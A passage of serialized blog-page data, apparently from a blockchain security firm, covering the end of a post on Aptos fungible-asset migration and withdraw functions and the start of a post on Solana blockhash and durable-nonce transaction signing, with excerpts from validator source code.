migrate_to_fungible_store",{"type":26,"tag":137,"props":69958,"children":69959},{"style":5601},[69960],{"type":32,"value":8391},{"type":26,"tag":137,"props":69962,"children":69963},{"style":6009},[69964],{"type":32,"value":9167},{"type":26,"tag":137,"props":69966,"children":69967},{"style":5601},[69968],{"type":32,"value":9172},{"type":26,"tag":137,"props":69970,"children":69971},{"class":5559,"line":5417},[69972,69976,69980,69984],{"type":26,"tag":137,"props":69973,"children":69974},{"style":5584},[69975],{"type":32,"value":27763},{"type":26,"tag":137,"props":69977,"children":69978},{"style":5590},[69979],{"type":32,"value":7072},{"type":26,"tag":137,"props":69981,"children":69982},{"style":5590},[69983],{"type":32,"value":9725},{"type":26,"tag":137,"props":69985,"children":69986},{"style":5584},[69987],{"type":32,"value":69988},"signer\n",{"type":26,"tag":137,"props":69990,"children":69991},{"class":5559,"line":5642},[69992,69996,70000,70004,70008,70013,70017,70021],{"type":26,"tag":137,"props":69993,"children":69994},{"style":5601},[69995],{"type":32,"value":5671},{"type":26,"tag":137,"props":69997,"children":69998},{"style":5584},[69999],{"type":32,"value":8929},{"type":26,"tag":137,"props":70001,"children":70002},{"style":6009},[70003],{"type":32,"value":63750},{"type":26,"tag":137,"props":70005,"children":70006},{"style":5601},[70007],{"type":32,"value":1108},{"type":26,"tag":137,"props":70009,"children":70010},{"style":6009},[70011],{"type":32,"value":70012},"CoinConversionMap",{"type":26,"tag":137,"props":70014,"children":70015},{"style":5601},[70016],{"type":32,"value":1108},{"type":26,"tag":137,"props":70018,"children":70019},{"style":6009},[70020],{"type":32,"value":9297},{"type":26,"tag":137,"props":70022,"children":70023},{"style":5601},[70024],{"type":32,"value":5875},{"type":26,"tag":137,"props":70026,"children":70027},{"class":5559,"line":5745},[70028,70033,70037,70041,70046,70050,70054,70058,70062],{"type":26,"tag":137,"props":70029,"children":70030},{"style":5584},[70031],{"type":32,"value":70032},"    maybe_convert_to_fungible_store",{"type":26,"tag":137,"props":70034,"children":70035},{"style":5601},[70036],{"type":32,"value":8391},{"type":26,"tag":137,"props":70038,"children":70039},{"style":6009},[70040],{"type":32,"value":9167},{"type":26,"tag":137,"props":70042,"children":70043},{"style":5601},[70044],{"type":32,"value":70045},">(signer",{"type":26,"tag":137,"props":70047,"children":70048},{"style":5590},[70049],{"type":32,"value":6072},{"type":26,"tag":137,"props":70051,"children":70052},{"style":5682},[70053],{"type":32,"value":9793},{"type":26,"tag":137,"props":70055,"children":70056},{"style":5601},[70057],{"type":32,"value":165},{"type":26,"tag":137,"props":70059,"children":70060},{"style":5584},[70061],{"type":32,"value":15544},{"type":26,"tag":137,"props":70063,"children":70064},{"style":5601},[70065],{"type":32,"value":9807},{"type":26,"tag":137,"props":70067,"children":70068},{"class":5559,"line":5850},[70069],{"type":26,"tag":137,"props":70070,"children":70071},{"style":5601},[70072],{"type":32,"value":6507},{"type":26,"tag":35,"props":70074,"children":70075},{},[70076,70078,70083,70085,70090],{"type":32,"value":70077},"A curious reader might wonder about the fate of the ",{"type":26,"tag":130,"props":70079,"children":70081},{"className":70080},[],[70082],{"type":32,"value":63729},{"type":32,"value":70084}," \"frozen\" status during migration. Unsurprisingly tough, the \"frozen\" status of the primary fungible store is matched to that of the ",{"type":26,"tag":130,"props":70086,"children":70088},{"className":70087},[],[70089],{"type":32,"value":63729},{"type":32,"value":70091}," to ensure consistency.",{"type":26,"tag":68786,"props":70093,"children":70094},{},[70095,70114],{"type":26,"tag":35,"props":70096,"children":70097},{},[70098,70100,70105,70107,70112],{"type":32,"value":70099},"Could an attacker convert their ",{"type":26,"tag":130,"props":70101,"children":70103},{"className":70102},[],[70104],{"type":32,"value":63729},{"type":32,"value":70106}," to a primary fungible store and then register another ",{"type":26,"tag":130,"props":70108,"children":70110},{"className":70109},[],[70111],{"type":32,"value":63729},{"type":32,"value":70113}," only to convert it again to manipulate the \"frozen\" status of the linked primary fungible store?",{"type":26,"tag":68817,"props":70115,"children":70116},{"v-slot:answer-0":7},[70117],{"type":26,"tag":35,"props":70118,"children":70119},{},[70120],{"type":32,"value":70121},"The coin::register function first checks is_account_registered, which exits early if true. is_account_registered determines if the account has a primary fungible store for the linked fungible asset when the CoinStore doesn’t exist. If the fungible store has been converted, a primary fungible store and linked fungible asset will already exist, preventing re-registration.",{"type":26,"tag":92,"props":70123,"children":70124},{"id":31526},[70125],{"type":32,"value":21540},{"type":26,"tag":35,"props":70127,"children":70128},{},[70129,70131,70136],{"type":32,"value":70130},"Aptos's implementation of fungible assets does indeed resolve the original problems with ",{"type":26,"tag":130,"props":70132,"children":70134},{"className":70133},[],[70135],{"type":32,"value":63567},{"type":32,"value":470},{"type":26,"tag":35,"props":70138,"children":70139},{},[70140],{"type":32,"value":70141},"However, this solution comes with its own challenges, in part because of the numerous layers that interact with each other. Before using the fungible asset standard, it's important to understand these different APIs and potential pitfalls.",{"type":26,"tag":35,"props":70143,"children":70144},{},[70145,70147],{"type":32,"value":70146},"As a final exercise to the reader, how many different ways are there to withdraw a fungible asset?",{"type":26,"tag":18065,"props":70148,"children":70149},{},[70150],{"type":26,"tag":41,"props":70151,"children":70153},{"href":32217,"ariaDescribedBy":70152,"dataFootnoteRef":7,"id":32219},[18072],[70154],{"type":32,"value":878},{"type":26,"tag":21015,"props":70156,"children":70158},{"className":70157,"dataFootnotes":7},[21018],[70159,70164],{"type":26,"tag":92,"props":70160,"children":70162},{"className":70161,"id":18072},[21023],[70163],{"type":32,"value":21026},{"type":26,"tag":4820,"props":70165,"children":70166},{},[70167],{"type":26,"tag":3430,"props":70168,"children":70169},{"id":32960},[70170,70172,70214],{"type":32,"value":70171},"There are at least four functions that can withdraw a fungible asset:",{"type":26,"tag":3426,"props":70173,"children":70174},{},[70175,70185,70194,70204],{"type":26,"tag":3430,"props":70176,"children":70177},{},[70178],{"type":26,"tag":41,"props":70179,"children":70183},{"href":70180,"rel":70181,":style":70182},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/fungible_asset.move#L782",[45],"color: #007bff;",[70184],{"type":32,"value":66867},{"type":26,"tag":3430,"props":70186,"children":70187},{},[70188],{"type":26,"tag":41,"props":70189,"children":70192},{"href":70190,"rel":70191,":style":70182},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/dispatchable_fungible_asset.move#L74",[45],[70193],{"type":32,"value":68807},{"type":26,"tag":3430,"props":70195,"children":70196},{},[70197],{"type":26,"tag":41,"props":70198,"children":70201},{"href":70199,"rel":70200,":style":70182},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move#L157",[45],[70202],{"type":32,"value":70203},"primary_fungible_store::withdraw",{"type":26,"tag":3430,"props":70205,"children":70206},{},[70207],{"type":26,"tag":41,"props":70208,"children":70211},{"href":70209,"rel":70210,":style":70182},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/coin.move#L1091-L1098",[45],[70212],{"type":32,"value":70213},"coin::withdraw",{"type":26,"tag":41,"props":70215,"children":70217},{"href":32988,"ariaLabel":21128,"className":70216,"dataFootnoteBackref":7},[21130],[70218],{"type":32,"value":21133},{"type":26,"tag":7949,"props":70220,"children":70221},{},[70222],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":70224},[70225,70226,70227,70230,70235,70236,70237,70238],{"id":63553,"depth":5412,"text":63556},{"id":64098,"depth":5412,"text":64101},{"id":64657,"depth":5412,"text":64660,"children":70228},[70229],{"id":65168,"depth":5417,"text":65171},{"id":65425,"depth":5412,"text":65428,"children":70231},[70232,70233,70234],{"id":65468,"depth":5417,"text":65471},{"id":66173,"depth":5417,"text":66176},{"id":67831,"depth":5417,"text":67834},{"id":68362,"depth":5412,"text":68365},{"id":69343,"depth":5412,"text":69346},{"id":31526,"depth":5412,"text":21540},{"id":18072,"depth":5412,"text":21026},"content:blog:2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets",{"_path":70243,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":70244,"description":70245,"date":70246,"author":8304,"image":70247,"isFeatured":18,"onBlogPage":18,"tags":70249,"body":70250,"_type":5433,"_id":72078,"_source":5435,"_file":72079,"_stem":72080,"_extension":5438},"/blog/2025-02-22-multisig-security","Solana Multisig Security","What can teams do if their multisig signers are compromised? We explore Solana's transaction signing model and present a procedure for safe signing in the presence of malicious signers on Solana.","2025-02-22",{"src":70248,"width":7969,"height":7970},"/posts/multisig-security/title.png",[5450],{"type":23,"children":70251,"toc":72069},[70252,70265,70271,70276,70282,70295,70303,70316,70376,70398,70525,70530,70543,70555,70561,70575,70588,70602,71084,71089,71097,71111,71125,71264,71276,71282,71287,71305,71310,71315,71336,71620,71635,71823,71836,71965,71970,71975,71980,72008,72014,72019,72033,72065],{"type":26,"tag":35,"props":70253,"children":70254},{},[70255,70256,70263],{"type":32,"value":19206},{"type":26,"tag":41,"props":70257,"children":70260},{"href":70258,"rel":70259},"https://www.securityalliance.org/news/2025-02-dprk-advisory",[45],[70261],{"type":32,"value":70262},"Bybit hack",{"type":32,"value":70264}," raises an interesting question: what can teams do if their signers are compromised?",{"type":26,"tag":92,"props":70266,"children":70268},{"id":70267},"solana-signatures",[70269],{"type":32,"value":70270},"Solana Signatures",{"type":26,"tag":35,"props":70272,"children":70273},{},[70274],{"type":32,"value":70275},"We first need to understand how Solana signatures work. There are two ways to sign a Solana transaction.",{"type":26,"tag":118,"props":70277,"children":70279},{"id":70278},"recent-blockhash",[70280],{"type":32,"value":70281},"Recent Blockhash",{"type":26,"tag":35,"props":70283,"children":70284},{},[70285,70287,70294],{"type":32,"value":70286},"The most straightforward is with a \"recent blockhash\". From ",{"type":26,"tag":41,"props":70288,"children":70291},{"href":70289,"rel":70290},"https://solana.com/developers/guides/advanced/confirmation",[45],[70292],{"type":32,"value":70293},"the docs",{"type":32,"value":7072},{"type":26,"tag":5503,"props":70296,"children":70297},{},[70298],{"type":26,"tag":35,"props":70299,"children":70300},{},[70301],{"type":32,"value":70302},"During transaction processing, Solana Validators will check if each transaction's recent blockhash is recorded within the most recent 151 stored hashes (aka \"max processing age\"). If the transaction's recent blockhash is older than this max processing age, the transaction is not processed.",{"type":26,"tag":35,"props":70304,"children":70305},{},[70306,70308,70315],{"type":32,"value":70307},"The actual constant ",{"type":26,"tag":41,"props":70309,"children":70312},{"href":70310,"rel":70311},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/sdk/clock/src/lib.rs#L129-L130",[45],[70313],{"type":32,"value":70314},"is defined here",{"type":32,"value":470},{"type":26,"tag":5512,"props":70317,"children":70319},{"className":5552,"code":70318,"language":5551,"meta":7,"style":7},"// The maximum age of a blockhash that will be accepted by the leader\npub const MAX_PROCESSING_AGE: usize = MAX_RECENT_BLOCKHASHES / 2;\n",[70320],{"type":26,"tag":130,"props":70321,"children":70322},{"__ignoreMap":7},[70323,70331],{"type":26,"tag":137,"props":70324,"children":70325},{"class":5559,"line":5560},[70326],{"type":26,"tag":137,"props":70327,"children":70328},{"style":5564},[70329],{"type":32,"value":70330},"// The maximum age of a blockhash that will be accepted by the leader\n",{"type":26,"tag":137,"props":70332,"children":70333},{"class":5559,"line":5412},[70334,70338,70342,70347,70351,70355,70359,70364,70368,70372],{"type":26,"tag":137,"props":70335,"children":70336},{"style":5573},[70337],{"type":32,"value":16281},{"type":26,"tag":137,"props":70339,"children":70340},{"style":5573},[70341],{"type":32,"value":41707},{"type":26,"tag":137,"props":70343,"children":70344},{"style":5601},[70345],{"type":32,"value":70346}," MAX_PROCESSING_AGE",{"type":26,"tag":137,"props":70348,"children":70349},{"style":5590},[70350],{"type":32,"value":7072},{"type":26,"tag":137,"props":70352,"children":70353},{"style":6009},[70354],{"type":32,"value":16322},{"type":26,"tag":137,"props":70356,"children":70357},{"style":5590},[70358],{"type":32,"value":5593},{"type":26,"tag":137,"props":70360,"children":70361},{"style":5601},[70362],{"type":32,"value":70363}," MAX_RECENT_BLOCKHASHES ",{"type":26,"tag":137,"props":70365,"children":70366},{"style":5590},[70367],{"type":32,"value":7162},{"type":26,"tag":137,"props":70369,"children":70370},{"style":5626},[70371],{"type":32,"value":10519},{"type":26,"tag":137,"props":70373,"children":70374},{"style":5601},[70375],{"type":32,"value":5604},{"type":26,"tag":35,"props":70377,"children":70378},{},[70379,70381,70388,70390,70396],{"type":32,"value":70380},"For those curious, the logic ",{"type":26,"tag":41,"props":70382,"children":70385},{"href":70383,"rel":70384},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L61",[45],[70386],{"type":32,"value":70387},"starts here",{"type":32,"value":70389}," and is quite straightforward to follow, ending in a ",{"type":26,"tag":130,"props":70391,"children":70393},{"className":70392},[],[70394],{"type":32,"value":70395},"is_hash_index_valid",{"type":32,"value":70397}," check.",{"type":26,"tag":5512,"props":70399,"children":70401},{"className":5552,"code":70400,"language":5551,"meta":7,"style":7},"fn is_hash_index_valid(last_hash_index: u64, max_age: usize, hash_index: u64) -> bool {\n    last_hash_index - hash_index \u003C= max_age as u64\n}\n",[70402],{"type":26,"tag":130,"props":70403,"children":70404},{"__ignoreMap":7},[70405,70484,70518],{"type":26,"tag":137,"props":70406,"children":70407},{"class":5559,"line":5560},[70408,70412,70417,70421,70426,70430,70434,70438,70443,70447,70451,70455,70460,70464,70468,70472,70476,70480],{"type":26,"tag":137,"props":70409,"children":70410},{"style":5573},[70411],{"type":32,"value":22860},{"type":26,"tag":137,"props":70413,"children":70414},{"style":5682},[70415],{"type":32,"value":70416}," is_hash_index_valid",{"type":26,"tag":137,"props":70418,"children":70419},{"style":5601},[70420],{"type":32,"value":165},{"type":26,"tag":137,"props":70422,"children":70423},{"style":5584},[70424],{"type":32,"value":70425},"last_hash_index",{"type":26,"tag":137,"props":70427,"children":70428},{"style":5590},[70429],{"type":32,"value":7072},{"type":26,"tag":137,"props":70431,"children":70432},{"style":6009},[70433],{"type":32,"value":8445},{"type":26,"tag":137,"props":70435,"children":70436},{"style":5601},[70437],{"type":32,"value":1108},{"type":26,"tag":137,"props":70439,"children":70440},{"style":5584},[70441],{"type":32,"value":70442},"max_age",{"type":26,"tag":137,"props":70444,"children":70445},{"style":5590},[70446],{"type":32,"value":7072},{"type":26,"tag":137,"props":70448,"children":70449},{"style":6009},[70450],{"type":32,"value":16322},{"type":26,"tag":137,"props":70452,"children":70453},{"style":5601},[70454],{"type":32,"value":1108},{"type":26,"tag":137,"props":70456,"children":70457},{"style":5584},[70458],{"type":32,"value":70459},"hash_index",{"type":26,"tag":137,"props":70461,"children":70462},{"style":5590},[70463],{"type":32,"value":7072},{"type":26,"tag":137,"props":70465,"children":70466},{"style":6009},[70467],{"type":32,"value":8445},{"type":26,"tag":137,"props":70469,"children":70470},{"style":5601},[70471],{"type":32,"value":5671},{"type":26,"tag":137,"props":70473,"children":70474},{"style":5590},[70475],{"type":32,"value":16348},{"type":26,"tag":137,"props":70477,"children":70478},{"style":6009},[70479],{"type":32,"value":14641},{"type":26,"tag":137,"props":70481,"children":70482},{"style":5601},[70483],{"type":32,"value":5875},{"type":26,"tag":137,"props":70485,"children":70486},{"class":5559,"line":5412},[70487,70492,70496,70501,70505,70510,70514],{"type":26,"tag":137,"props":70488,"children":70489},{"style":5584},[70490],{"type":32,"value":70491},"    last_hash_index",{"type":26,"tag":137,"props":70493,"children":70494},{"style":5590},[70495],{"type":32,"value":53858},{"type":26,"tag":137,"props":70497,"children":70498},{"style":5584},[70499],{"type":32,"value":70500}," hash_index",{"type":26,"tag":137,"props":70502,"children":70503},{"style":5590},[70504],{"type":32,"value":10782},{"type":26,"tag":137,"props":70506,"children":70507},{"style":5584},[70508],{"type":32,"value":70509}," max_age",{"type":26,"tag":137,"props":70511,"children":70512},{"style":5573},[70513],{"type":32,"value":11414},{"type":26,"tag":137,"props":70515,"children":70516},{"style":6009},[70517],{"type":32,"value":15788},{"type":26,"tag":137,"props":70519,"children":70520},{"class":5559,"line":5417},[70521],{"type":26,"tag":137,"props":70522,"children":70523},{"style":5601},[70524],{"type":32,"value":6507},{"type":26,"tag":35,"props":70526,"children":70527},{},[70528],{"type":32,"value":70529},"One important consequence is that any signed transaction has a natural expiration of around a few minutes.",{"type":26,"tag":5503,"props":70531,"children":70532},{},[70533],{"type":26,"tag":35,"props":70534,"children":70535},{},[70536,70538],{"type":32,"value":70537},"Since slots (aka the time period a validator can produce a block) are configured to last about 400ms, but may fluctuate between 400ms and 600ms, ",{"type":26,"tag":84,"props":70539,"children":70540},{},[70541],{"type":32,"value":70542},"a given blockhash can only be used by transactions for about 60 to 90 seconds before it will be considered expired by the runtime.",{"type":26,"tag":35,"props":70544,"children":70545},{},[70546,70548,70553],{"type":32,"value":70547},"This means an attacker ",{"type":26,"tag":762,"props":70549,"children":70550},{},[70551],{"type":32,"value":70552},"must use",{"type":32,"value":70554}," a malicious signed transaction within a short timeframe.",{"type":26,"tag":118,"props":70556,"children":70558},{"id":70557},"durable-nonce",[70559],{"type":32,"value":70560},"Durable Nonce",{"type":26,"tag":35,"props":70562,"children":70563},{},[70564,70566,70573],{"type":32,"value":70565},"The second type of signature ",{"type":26,"tag":41,"props":70567,"children":70570},{"href":70568,"rel":70569},"https://solana.com/developers/guides/advanced/introduction-to-durable-nonces",[45],[70571],{"type":32,"value":70572},"is a durable nonce",{"type":32,"value":70574},". These were created to solve the very feature (or problem) mentioned above: short expiration time.",{"type":26,"tag":5503,"props":70576,"children":70577},{},[70578],{"type":26,"tag":35,"props":70579,"children":70580},{},[70581,70583],{"type":32,"value":70582},"durable nonces provide an opportunity to create and sign a transaction that can be submitted at any point in the future, and much more. ",{"type":26,"tag":84,"props":70584,"children":70585},{},[70586],{"type":32,"value":70587},"This opens up a wide range of use cases that are otherwise not possible or too difficult to implement",{"type":26,"tag":35,"props":70589,"children":70590},{},[70591,70593,70600],{"type":32,"value":70592},"If we examine the code ",{"type":26,"tag":41,"props":70594,"children":70597},{"href":70595,"rel":70596},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L104",[45],[70598],{"type":32,"value":70599},"for recent blockhash validation",{"type":32,"value":70601},", we can also see the handling for durable nonces.",{"type":26,"tag":5512,"props":70603,"children":70605},{"className":5552,"code":70604,"language":5551,"meta":7,"style":7},"    let recent_blockhash = tx.message().recent_blockhash();\n    if let Some(hash_info) = hash_queue.get_hash_info_if_valid(recent_blockhash, max_age) {\n        Ok(CheckedTransactionDetails {\n            nonce: None,\n            lamports_per_signature: hash_info.lamports_per_signature(),\n        })\n    } else if let Some((nonce, previous_lamports_per_signature)) = self\n        .check_load_and_advance_message_nonce_account(\n            tx.message(),\n            next_durable_nonce,\n            next_lamports_per_signature,\n        )\n    {\n        Ok(CheckedTransactionDetails {\n            nonce: Some(nonce),\n            lamports_per_signature: previous_lamports_per_signature,\n        })\n    } else {\n        error_counters.blockhash_not_found += 1;\n        Err(TransactionError::BlockhashNotFound)\n    }\n",[70606],{"type":26,"tag":130,"props":70607,"children":70608},{"__ignoreMap":7},[70609,70656,70722,70742,70762,70792,70800,70854,70871,70891,70903,70915,70923,70930,70949,70976,70996,71003,71018,71048,71077],{"type":26,"tag":137,"props":70610,"children":70611},{"class":5559,"line":5560},[70612,70616,70621,70625,70630,70634,70639,70643,70647,70652],{"type":26,"tag":137,"props":70613,"children":70614},{"style":5573},[70615],{"type":32,"value":5576},{"type":26,"tag":137,"props":70617,"children":70618},{"style":5584},[70619],{"type":32,"value":70620}," recent_blockhash",{"type":26,"tag":137,"props":70622,"children":70623},{"style":5590},[70624],{"type":32,"value":5593},{"type":26,"tag":137,"props":70626,"children":70627},{"style":5584},[70628],{"type":32,"value":70629}," tx",{"type":26,"tag":137,"props":70631,"children":70632},{"style":5590},[70633],{"type":32,"value":470},{"type":26,"tag":137,"props":70635,"children":70636},{"style":5682},[70637],{"type":32,"value":70638},"message",{"type":26,"tag":137,"props":70640,"children":70641},{"style":5601},[70642],{"type":32,"value":16470},{"type":26,"tag":137,"props":70644,"children":70645},{"style":5590},[70646],{"type":32,"value":470},{"type":26,"tag":137,"props":70648,"children":70649},{"style":5682},[70650],{"type":32,"value":70651},"recent_blockhash",{"type":26,"tag":137,"props":70653,"children":70654},{"style":5601},[70655],{"type":32,"value":6267},{"type":26,"tag":137,"props":70657,"children":70658},{"class":5559,"line":5412},[70659,70663,70667,70671,70675,70680,70684,70688,70693,70697,70702,70706,70710,70714,70718],{"type":26,"tag":137,"props":70660,"children":70661},{"style":5610},[70662],{"type":32,"value":14870},{"type":26,"tag":137,"props":70664,"children":70665},{"style":5573},[70666],{"type":32,"value":29897},{"type":26,"tag":137,"props":70668,"children":70669},{"style":6009},[70670],{"type":32,"value":29902},{"type":26,"tag":137,"props":70672,"children":70673},{"style":5601},[70674],{"type":32,"value":165},{"type":26,"tag":137,"props":70676,"children":70677},{"style":5584},[70678],{"type":32,"value":70679},"hash_info",{"type":26,"tag":137,"props":70681,"children":70682},{"style":5601},[70683],{"type":32,"value":5671},{"type":26,"tag":137,"props":70685,"children":70686},{"style":5590},[70687],{"type":32,"value":289},{"type":26,"tag":137,"props":70689,"children":70690},{"style":5584},[70691],{"type":32,"value":70692}," hash_queue",{"type":26,"tag":137,"props":70694,"children":70695},{"style":5590},[70696],{"type":32,"value":470},{"type":26,"tag":137,"props":70698,"children":70699},{"style":5682},[70700],{"type":32,"value":70701},"get_hash_info_if_valid",{"type":26,"tag":137,"props":70703,"children":70704},{"style":5601},[70705],{"type":32,"value":165},{"type":26,"tag":137,"props":70707,"children":70708},{"style":5584},[70709],{"type":32,"value":70651},{"type":26,"tag":137,"props":70711,"children":70712},{"style":5601},[70713],{"type":32,"value":1108},{"type":26,"tag":137,"props":70715,"children":70716},{"style":5584},[70717],{"type":32,"value":70442},{"type":26,"tag":137,"props":70719,"children":70720},{"style":5601},[70721],{"type":32,"value":17395},{"type":26,"tag":137,"props":70723,"children":70724},{"class":5559,"line":5417},[70725,70729,70733,70738],{"type":26,"tag":137,"props":70726,"children":70727},{"style":6009},[70728],{"type":32,"value":17403},{"type":26,"tag":137,"props":70730,"children":70731},{"style":5601},[70732],{"type":32,"value":165},{"type":26,"tag":137,"props":70734,"children":70735},{"style":6009},[70736],{"type":32,"value":70737},"CheckedTransactionDetails",{"type":26,"tag":137,"props":70739,"children":70740},{"style":5601},[70741],{"type":32,"value":5875},{"type":26,"tag":137,"props":70743,"children":70744},{"class":5559,"line":5642},[70745,70750,70754,70758],{"type":26,"tag":137,"props":70746,"children":70747},{"style":5584},[70748],{"type":32,"value":70749},"            nonce",{"type":26,"tag":137,"props":70751,"children":70752},{"style":5590},[70753],{"type":32,"value":7072},{"type":26,"tag":137,"props":70755,"children":70756},{"style":6009},[70757],{"type":32,"value":30350},{"type":26,"tag":137,"props":70759,"children":70760},{"style":5601},[70761],{"type":32,"value":6099},{"type":26,"tag":137,"props":70763,"children":70764},{"class":5559,"line":5745},[70765,70770,70774,70779,70783,70788],{"type":26,"tag":137,"props":70766,"children":70767},{"style":5584},[70768],{"type":32,"value":70769},"            lamports_per_signature",{"type":26,"tag":137,"props":70771,"children":70772},{"style":5590},[70773],{"type":32,"value":7072},{"type":26,"tag":137,"props":70775,"children":70776},{"style":5584},[70777],{"type":32,"value":70778}," hash_info",{"type":26,"tag":137,"props":70780,"children":70781},{"style":5590},[70782],{"type":32,"value":470},{"type":26,"tag":137,"props":70784,"children":70785},{"style":5682},[70786],{"type":32,"value":70787},"lamports_per_signature",{"type":26,"tag":137,"props":70789,"children":70790},{"style":5601},[70791],{"type":32,"value":6082},{"type":26,"tag":137,"props":70793,"children":70794},{"class":5559,"line":5850},[70795],{"type":26,"tag":137,"props":70796,"children":70797},{"style":5601},[70798],{"type":32,"value":70799},"        })\n",{"type":26,"tag":137,"props":70801,"children":70802},{"class":5559,"line":5878},[70803,70807,70811,70815,70819,70823,70827,70832,70836,70841,70845,70849],{"type":26,"tag":137,"props":70804,"children":70805},{"style":5601},[70806],{"type":32,"value":18371},{"type":26,"tag":137,"props":70808,"children":70809},{"style":5610},[70810],{"type":32,"value":5902},{"type":26,"tag":137,"props":70812,"children":70813},{"style":5610},[70814],{"type":32,"value":18380},{"type":26,"tag":137,"props":70816,"children":70817},{"style":5573},[70818],{"type":32,"value":29897},{"type":26,"tag":137,"props":70820,"children":70821},{"style":6009},[70822],{"type":32,"value":29902},{"type":26,"tag":137,"props":70824,"children":70825},{"style":5601},[70826],{"type":32,"value":34118},{"type":26,"tag":137,"props":70828,"children":70829},{"style":5584},[70830],{"type":32,"value":70831},"nonce",{"type":26,"tag":137,"props":70833,"children":70834},{"style":5601},[70835],{"type":32,"value":1108},{"type":26,"tag":137,"props":70837,"children":70838},{"style":5584},[70839],{"type":32,"value":70840},"previous_lamports_per_signature",{"type":26,"tag":137,"props":70842,"children":70843},{"style":5601},[70844],{"type":32,"value":11423},{"type":26,"tag":137,"props":70846,"children":70847},{"style":5590},[70848],{"type":32,"value":289},{"type":26,"tag":137,"props":70850,"children":70851},{"style":5573},[70852],{"type":32,"value":70853}," self\n",{"type":26,"tag":137,"props":70855,"children":70856},{"class":5559,"line":5891},[70857,70862,70867],{"type":26,"tag":137,"props":70858,"children":70859},{"style":5590},[70860],{"type":32,"value":70861},"        .",{"type":26,"tag":137,"props":70863,"children":70864},{"style":5682},[70865],{"type":32,"value":70866},"check_load_and_advance_message_nonce_account",{"type":26,"tag":137,"props":70868,"children":70869},{"style":5601},[70870],{"type":32,"value":6054},{"type":26,"tag":137,"props":70872,"children":70873},{"class":5559,"line":5909},[70874,70879,70883,70887],{"type":26,"tag":137,"props":70875,"children":70876},{"style":5584},[70877],{"type":32,"value":70878},"            tx",{"type":26,"tag":137,"props":70880,"children":70881},{"style":5590},[70882],{"type":32,"value":470},{"type":26,"tag":137,"props":70884,"children":70885},{"style":5682},[70886],{"type":32,"value":70638},{"type":26,"tag":137,"props":70888,"children":70889},{"style":5601},[70890],{"type":32,"value":6082},{"type":26,"tag":137,"props":70892,"children":70893},{"class":5559,"line":5930},[70894,70899],{"type":26,"tag":137,"props":70895,"children":70896},{"style":5584},[70897],{"type":32,"value":70898},"            next_durable_nonce",{"type":26,"tag":137,"props":70900,"children":70901},{"style":5601},[70902],{"type":32,"value":6099},{"type":26,"tag":137,"props":70904,"children":70905},{"class":5559,"line":5939},[70906,70911],{"type":26,"tag":137,"props":70907,"children":70908},{"style":5584},[70909],{"type":32,"value":70910},"            next_lamports_per_signature",{"type":26,"tag":137,"props":70912,"children":70913},{"style":5601},[70914],{"type":32,"value":6099},{"type":26,"tag":137,"props":70916,"children":70917},{"class":5559,"line":6191},[70918],{"type":26,"tag":137,"props":70919,"children":70920},{"style":5601},[70921],{"type":32,"value":70922},"        )\n",{"type":26,"tag":137,"props":70924,"children":70925},{"class":5559,"line":6208},[70926],{"type":26,"tag":137,"props":70927,"children":70928},{"style":5601},[70929],{"type":32,"value":31781},{"type":26,"tag":137,"props":70931,"children":70932},{"class":5559,"line":6225},[70933,70937,70941,70945],{"type":26,"tag":137,"props":70934,"children":70935},{"style":6009},[70936],{"type":32,"value":17403},{"type":26,"tag":137,"props":70938,"children":70939},{"style":5601},[70940],{"type":32,"value":165},{"type":26,"tag":137,"props":70942,"children":70943},{"style":6009},[70944],{"type":32,"value":70737},{"type":26,"tag":137,"props":70946,"children":70947},{"style":5601},[70948],{"type":32,"value":5875},{"type":26,"tag":137,"props":70950,"children":70951},{"class":5559,"line":6238},[70952,70956,70960,70964,70968,70972],{"type":26,"tag":137,"props":70953,"children":70954},{"style":5584},[70955],{"type":32,"value":70749},{"type":26,"tag":137,"props":70957,"children":70958},{"style":5590},[70959],{"type":32,"value":7072},{"type":26,"tag":137,"props":70961,"children":70962},{"style":6009},[70963],{"type":32,"value":29902},{"type":26,"tag":137,"props":70965,"children":70966},{"style":5601},[70967],{"type":32,"value":165},{"type":26,"tag":137,"props":70969,"children":70970},{"style":5584},[70971],{"type":32,"value":70831},{"type":26,"tag":137,"props":70973,"children":70974},{"style":5601},[70975],{"type":32,"value":9320},{"type":26,"tag":137,"props":70977,"children":70978},{"class":5559,"line":6247},[70979,70983,70987,70992],{"type":26,"tag":137,"props":70980,"children":70981},{"style":5584},[70982],{"type":32,"value":70769},{"type":26,"tag":137,"props":70984,"children":70985},{"style":5590},[70986],{"type":32,"value":7072},{"type":26,"tag":137,"props":70988,"children":70989},{"style":5584},[70990],{"type":32,"value":70991}," previous_lamports_per_signature",{"type":26,"tag":137,"props":70993,"children":70994},{"style":5601},[70995],{"type":32,"value":6099},{"type":26,"tag":137,"props":70997,"children":70998},{"class":5559,"line":6270},[70999],{"type":26,"tag":137,"props":71000,"children":71001},{"style":5601},[71002],{"type":32,"value":70799},{"type":26,"tag":137,"props":71004,"children":71005},{"class":5559,"line":6279},[71006,71010,71014],{"type":26,"tag":137,"props":71007,"children":71008},{"style":5601},[71009],{"type":32,"value":18371},{"type":26,"tag":137,"props":71011,"children":71012},{"style":5610},[71013],{"type":32,"value":5902},{"type":26,"tag":137,"props":71015,"children":71016},{"style":5601},[71017],{"type":32,"value":5875},{"type":26,"tag":137,"props":71019,"children":71020},{"class":5559,"line":6288},[71021,71026,71030,71035,71040,71044],{"type":26,"tag":137,"props":71022,"children":71023},{"style":5584},[71024],{"type":32,"value":71025},"        